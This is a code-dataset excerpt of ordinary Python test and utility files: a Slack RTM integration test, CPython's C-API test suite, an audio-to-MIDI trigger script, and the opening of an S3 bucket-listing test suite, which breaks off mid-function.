source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
test_issue_631.py
|
import asyncio
import collections
import logging
import os
import threading
import time
import traceback
import unittest
import pytest
from integration_tests.env_variable_names import (
SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN,
SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID,
)
from integration_tests.helpers import async_test, is_not_specified
from slack_sdk.rtm import RTMClient
from slack_sdk.web import WebClient
class TestRTMClient(unittest.TestCase):
"""Runs integration tests with real Slack API
https://github.com/slackapi/python-slack-sdk/issues/631
"""
def setUp(self):
if not hasattr(self, "logger"):
self.logger = logging.getLogger(__name__)
self.channel_id = os.environ[SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID]
self.bot_token = os.environ[SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN]
def tearDown(self):
# Reset the decorators by @RTMClient.run_on
RTMClient._callbacks = collections.defaultdict(list)
# Stop the Client
if hasattr(self, "rtm_client") and not self.rtm_client._stopped:
self.rtm_client.stop()
@pytest.mark.skipif(
condition=is_not_specified(), reason="to avoid rate_limited errors"
)
def test_issue_631_sharing_event_loop(self):
self.success = None
self.text = "This message was sent to verify issue #631"
self.rtm_client = RTMClient(
token=self.bot_token,
run_async=False,
loop=asyncio.new_event_loop(), # TODO: this doesn't work without this
)
# @RTMClient.run_on(event="message")
# def send_reply(**payload):
# self.logger.debug(payload)
# data = payload['data']
# web_client = payload['web_client']
# web_client._event_loop = self.loop
# # Maybe you will also need the following line uncommented
# # web_client.run_async = True
#
# if self.text in data['text']:
# channel_id = data['channel']
# thread_ts = data['ts']
# try:
# self.success = web_client.chat_postMessage(
# channel=channel_id,
# text="Thanks!",
# thread_ts=thread_ts
# )
# except Exception as e:
# # slack.rtm.client:client.py:446 When calling '#send_reply()'
# # in the 'test_rtm_client' module the following error was raised: This event loop is already running
# self.logger.error(traceback.format_exc())
# raise e
# Solution (1) for #631
@RTMClient.run_on(event="message")
def send_reply(**payload):
self.logger.debug(payload)
data = payload["data"]
web_client = payload["web_client"]
try:
if "text" in data and self.text in data["text"]:
channel_id = data["channel"]
thread_ts = data["ts"]
self.success = web_client.chat_postMessage(
channel=channel_id, text="Thanks!", thread_ts=thread_ts
)
except Exception as e:
self.logger.error(traceback.format_exc())
raise e
def connect():
self.logger.debug("Starting RTM Client...")
self.rtm_client.start()
t = threading.Thread(target=connect)
t.setDaemon(True)
t.start()
try:
self.assertIsNone(self.success)
time.sleep(5)
self.web_client = WebClient(
token=self.bot_token,
run_async=False,
)
new_message = self.web_client.chat_postMessage(
channel=self.channel_id, text=self.text
)
self.assertFalse("error" in new_message)
time.sleep(5)
self.assertIsNotNone(self.success)
finally:
t.join(0.3)
# Solution (2) for #631
@pytest.mark.skipif(
condition=is_not_specified(), reason="this is just for reference"
)
@async_test
async def test_issue_631_sharing_event_loop_async(self):
self.success = None
self.text = "This message was sent to verify issue #631"
# To make run_async=True, the test method needs to be an async function + @async_test decorator
self.rtm_client = RTMClient(token=self.bot_token, run_async=True)
self.web_client = WebClient(token=self.bot_token, run_async=True)
@RTMClient.run_on(event="message")
async def send_reply(**payload):
self.logger.debug(payload)
data = payload["data"]
web_client = payload["web_client"]
try:
if "text" in data and self.text in data["text"]:
channel_id = data["channel"]
thread_ts = data["ts"]
self.success = await web_client.chat_postMessage(
channel=channel_id, text="Thanks!", thread_ts=thread_ts
)
except Exception as e:
self.logger.error(traceback.format_exc())
raise e
# intentionally not waiting here
self.rtm_client.start()
self.assertIsNone(self.success)
await asyncio.sleep(5)
self.web_client = WebClient(
token=self.bot_token,
run_async=True, # all need to be async here
)
new_message = await self.web_client.chat_postMessage(
channel=self.channel_id, text=self.text
)
self.assertFalse("error" in new_message)
await asyncio.sleep(5)
self.assertIsNotNone(self.success)
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import os
import pickle
import random
import re
import subprocess
import sys
import sysconfig
import textwrap
import threading
import time
import unittest
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error:'
b' PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned NULL '
br'without setting an error\n'
br'SystemError: <built-in function '
br'return_null_without_error> returned NULL '
br'without setting an error\n'
br'\n'
br'Current thread.*:\n'
br' File .*", line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an error')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned a '
br'result with an error set\n'
br'ValueError\n'
br'\n'
br'The above exception was the direct cause '
br'of the following exception:\n'
br'\n'
br'SystemError: <built-in '
br'function return_result_with_error> '
br'returned a result with an error set\n'
br'\n'
br'Current thread.*:\n'
br' File .*, line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an error set')
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
self.assertIn(b'MemoryError 1 10', out)
self.assertIn(b'MemoryError 2 20', out)
self.assertIn(b'MemoryError 3 30', out)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
locals().update((name, getattr(_testcapi, name))
for name in dir(_testcapi)
if name.startswith('test_') and not name.endswith('_code'))
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure('-c', code,
PYTHONMALLOC=self.PYTHONMALLOC)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfb\n"
r" at tail\+2: 0xfb\n"
r" .*\n"
r" The block was made by call #[0-9]+ to debug malloc/realloc.\n"
r" Data at p: cb cb cb .*\n"
r"\n"
r"Fatal Python error: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r" The block was made by call #[0-9]+ to debug malloc/realloc.\n"
r" Data at p: cb cb cb .*\n"
r"\n"
r"Fatal Python error: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: Python memory allocator called '
'without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
if __name__ == "__main__":
unittest.main()
|
compiled1.py
|
import pyaudio
import numpy
import matplotlib.pyplot as plt
from threading import Thread
import matplotlib.animation as animation
print "11111111"
import rtmidi_python as rtmidi
import time
fig = plt.figure();
ax1 = fig.add_subplot(1,1,1)
xar = [];
yar = [];
def update(y):
xar.append(time.time());
yar.append(y);
ax1.plot(xar,yar);
c4=0x30
d4=0x32
e4=0x34
f4=0x35
g4=0x37
b4=0x3B
c5=0x3C
d5=0x3E
e5=0x40
f5=0x41
g5=0x43
a5=0x45
b5=0x47
c6=0x48
on=0x90
off=0x80
vel=100
def msg (note):
midi_out.send_message([on,note,vel])
time.sleep(0.5)
midi_out.send_message([off,note,vel])
midi_out = rtmidi.MidiOut()
midi_out.open_port(0)
h=[c4,c4,d4,c4,f4,e4,c4,c4,d4,c4,g4,f4,c4,c4]
#midi_out.send_message([0x80, 48, 100])
RATE=16000
RECORD_SECONDS = 10
CHUNKSIZE = 1024
peakinfo = 0;
flag = 0;
triggger = 0;
# initialize portaudio
p = pyaudio.PyAudio()
stream = p.open(format=pyaudio.paInt16, channels=1, rate=RATE, input=True, frames_per_buffer=CHUNKSIZE, input_device_index=0)
envelope = [] # A python-list of chunks(numpy.ndarray)
recording = []
mem = []
peakinfo=0
flag=0
trigger=0
update(0);
for num in range(0, int(RATE / CHUNKSIZE * RECORD_SECONDS)):
data = stream.read(CHUNKSIZE)
chunk=numpy.fromstring(data, dtype=numpy.int16)
frame=chunk.tolist();
if (num==0):
for i in range(0,50):
recording.append(abs(frame[i]));
for i in range(50,1024):
for k in range(i-50,i):
mem.append(abs(frame[k]))
recording.append(max(mem))
if(max(mem)>20000):
peakinfo=peakinfo+1;
#print peakinfo
if((peakinfo>30)and(flag==0)):
flag=1;
trigger=trigger+1;
#msg(h[trigger-1])
update(max(mem));
msgthread=Thread(target=msg,args=(h[trigger-1],))
msgthread.start()
print trigger;
if(max(mem)<5000):
peakinfo=0
flag=0
del mem[:]
mem=frame[974:1024];
for i in range(len(mem)-1):
mem[i]=abs(mem[i]);
else:
for i in range(0,1024):
recording.append(max(mem));
if(max(mem)>20000):
peakinfo=peakinfo+1;
if((peakinfo>30)and(flag==0)):
flag=1;
trigger=trigger+1;
#msg(h[trigger-1])
update(max(mem));
msgthread=Thread(target=msg,args=(h[trigger-1],))
msgthread.start()
print trigger;
if(max(mem)<5000):
peakinfo=0
flag=0
del mem[0]
mem.append(abs(chunk[i]))
#Convert the list of numpy-arrays into a 1D array (column-wise)
#numpydata = numpy.hstack(frames)
#plt.plot(recording);
#plt.show();
# close stream
stream.stop_stream()
stream.close()
p.terminate()
|
test_s3.py
|
import boto3
import botocore.session
from botocore.exceptions import ClientError
from botocore.exceptions import ParamValidationError
from nose.tools import eq_ as eq
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
import isodate
import email.utils
import datetime
import threading
import re
import pytz
from collections import OrderedDict
import requests
import json
import base64
import hmac
import hashlib
import xml.etree.ElementTree as ET
import time
import operator
import nose
import os
import string
import random
import socket
import dateutil.parser
import ssl
from collections import namedtuple
from email.header import decode_header
from .utils import assert_raises
from .utils import generate_random
from .utils import _get_status_and_error_code
from .utils import _get_status
from .policy import Policy, Statement, make_json_policy
from . import (
get_client,
get_prefix,
get_unauthenticated_client,
get_bad_auth_client,
get_v2_client,
get_new_bucket,
get_new_bucket_name,
get_new_bucket_resource,
get_config_is_secure,
get_config_host,
get_config_port,
get_config_endpoint,
get_config_ssl_verify,
get_main_aws_access_key,
get_main_aws_secret_key,
get_main_display_name,
get_main_user_id,
get_main_email,
get_main_api_name,
get_alt_aws_access_key,
get_alt_aws_secret_key,
get_alt_display_name,
get_alt_user_id,
get_alt_email,
get_alt_client,
get_tenant_client,
get_tenant_iam_client,
get_tenant_user_id,
get_buckets_list,
get_objects_list,
get_main_kms_keyid,
get_secondary_kms_keyid,
get_svc_client,
nuke_prefixed_buckets,
)
def _bucket_is_empty(bucket):
is_empty = True
for obj in bucket.objects.all():
is_empty = False
break
return is_empty
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='empty buckets return no contents')
def test_bucket_list_empty():
bucket = get_new_bucket_resource()
is_empty = _bucket_is_empty(bucket)
eq(is_empty, True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='distinct buckets have different contents')
def test_bucket_list_distinct():
bucket1 = get_new_bucket_resource()
bucket2 = get_new_bucket_resource()
obj = bucket1.put_object(Body='str', Key='asdf')
is_empty = _bucket_is_empty(bucket2)
eq(is_empty, True)
def _create_objects(bucket=None, bucket_name=None, keys=[]):
"""
Populate a (specified or new) bucket with objects with
specified names (and contents identical to their names).
"""
if bucket_name is None:
bucket_name = get_new_bucket_name()
if bucket is None:
bucket = get_new_bucket_resource(name=bucket_name)
for key in keys:
obj = bucket.put_object(Body=key, Key=key)
return bucket_name
def _get_keys(response):
"""
return lists of strings that are the keys from a client.list_objects() response
"""
keys = []
if 'Contents' in response:
objects_list = response['Contents']
keys = [obj['Key'] for obj in objects_list]
return keys
def _get_prefixes(response):
"""
return lists of strings that are prefixes from a client.list_objects() response
"""
prefixes = []
if 'CommonPrefixes' in response:
prefix_list = response['CommonPrefixes']
prefixes = [prefix['Prefix'] for prefix in prefix_list]
return prefixes
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='pagination w/max_keys=2, no marker')
def test_bucket_list_many():
bucket_name = _create_objects(keys=['foo', 'bar', 'baz'])
client = get_client()
response = client.list_objects(Bucket=bucket_name, MaxKeys=2)
keys = _get_keys(response)
eq(len(keys), 2)
eq(keys, ['bar', 'baz'])
eq(response['IsTruncated'], True)
response = client.list_objects(Bucket=bucket_name, Marker='baz',MaxKeys=2)
keys = _get_keys(response)
eq(len(keys), 1)
eq(response['IsTruncated'], False)
eq(keys, ['foo'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='pagination w/max_keys=2, no marker')
@attr('list-objects-v2')
def test_bucket_listv2_many():
bucket_name = _create_objects(keys=['foo', 'bar', 'baz'])
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, MaxKeys=2)
keys = _get_keys(response)
eq(len(keys), 2)
eq(keys, ['bar', 'baz'])
eq(response['IsTruncated'], True)
response = client.list_objects_v2(Bucket=bucket_name, StartAfter='baz',MaxKeys=2)
keys = _get_keys(response)
eq(len(keys), 1)
eq(response['IsTruncated'], False)
eq(keys, ['foo'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='keycount in listobjectsv2')
@attr('list-objects-v2')
def test_basic_key_count():
client = get_client()
bucket_names = []
bucket_name = get_new_bucket_name()
client.create_bucket(Bucket=bucket_name)
for j in range(5):
client.put_object(Bucket=bucket_name, Key=str(j))
response1 = client.list_objects_v2(Bucket=bucket_name)
eq(response1['KeyCount'], 5)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='prefixes in multi-component object names')
def test_bucket_list_delimiter_basic():
bucket_name = _create_objects(keys=['foo/bar', 'foo/bar/xyzzy', 'quux/thud', 'asdf'])
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='/')
eq(response['Delimiter'], '/')
keys = _get_keys(response)
eq(keys, ['asdf'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
eq(prefixes, ['foo/', 'quux/'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='prefixes in multi-component object names')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_basic():
bucket_name = _create_objects(keys=['foo/bar', 'foo/bar/xyzzy', 'quux/thud', 'asdf'])
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='/')
eq(response['Delimiter'], '/')
keys = _get_keys(response)
eq(keys, ['asdf'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
eq(prefixes, ['foo/', 'quux/'])
eq(response['KeyCount'], len(prefixes) + len(keys))
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='test url encoding')
@attr('list-objects-v2')
def test_bucket_listv2_encoding_basic():
bucket_name = _create_objects(keys=['foo+1/bar', 'foo/bar/xyzzy', 'quux ab/thud', 'asdf+b'])
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='/', EncodingType='url')
eq(response['Delimiter'], '/')
keys = _get_keys(response)
eq(keys, ['asdf%2Bb'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 3)
eq(prefixes, ['foo%2B1/', 'foo/', 'quux%20ab/'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='test url encoding')
@attr('list-objects')
def test_bucket_list_encoding_basic():
bucket_name = _create_objects(keys=['foo+1/bar', 'foo/bar/xyzzy', 'quux ab/thud', 'asdf+b'])
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='/', EncodingType='url')
eq(response['Delimiter'], '/')
keys = _get_keys(response)
eq(keys, ['asdf%2Bb'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 3)
eq(prefixes, ['foo%2B1/', 'foo/', 'quux%20ab/'])
def validate_bucket_list(bucket_name, prefix, delimiter, marker, max_keys,
is_truncated, check_objs, check_prefixes, next_marker):
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter=delimiter, Marker=marker, MaxKeys=max_keys, Prefix=prefix)
eq(response['IsTruncated'], is_truncated)
if 'NextMarker' not in response:
response['NextMarker'] = None
eq(response['NextMarker'], next_marker)
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(len(keys), len(check_objs))
eq(len(prefixes), len(check_prefixes))
eq(keys, check_objs)
eq(prefixes, check_prefixes)
return response['NextMarker']
def validate_bucket_listv2(bucket_name, prefix, delimiter, continuation_token, max_keys,
is_truncated, check_objs, check_prefixes, last=False):
client = get_client()
params = dict(Bucket=bucket_name, Delimiter=delimiter, MaxKeys=max_keys, Prefix=prefix)
if continuation_token is not None:
params['ContinuationToken'] = continuation_token
else:
params['StartAfter'] = ''
response = client.list_objects_v2(**params)
eq(response['IsTruncated'], is_truncated)
if 'NextContinuationToken' not in response:
response['NextContinuationToken'] = None
if last:
eq(response['NextContinuationToken'], None)
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(len(keys), len(check_objs))
eq(len(prefixes), len(check_prefixes))
eq(keys, check_objs)
eq(prefixes, check_prefixes)
return response['NextContinuationToken']
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='prefixes in multi-component object names')
def test_bucket_list_delimiter_prefix():
bucket_name = _create_objects(keys=['asdf', 'boo/bar', 'boo/baz/xyzzy', 'cquux/thud', 'cquux/bla'])
delim = '/'
marker = ''
prefix = ''
marker = validate_bucket_list(bucket_name, prefix, delim, '', 1, True, ['asdf'], [], 'asdf')
marker = validate_bucket_list(bucket_name, prefix, delim, marker, 1, True, [], ['boo/'], 'boo/')
marker = validate_bucket_list(bucket_name, prefix, delim, marker, 1, False, [], ['cquux/'], None)
marker = validate_bucket_list(bucket_name, prefix, delim, '', 2, True, ['asdf'], ['boo/'], 'boo/')
marker = validate_bucket_list(bucket_name, prefix, delim, marker, 2, False, [], ['cquux/'], None)
prefix = 'boo/'
marker = validate_bucket_list(bucket_name, prefix, delim, '', 1, True, ['boo/bar'], [], 'boo/bar')
marker = validate_bucket_list(bucket_name, prefix, delim, marker, 1, False, [], ['boo/baz/'], None)
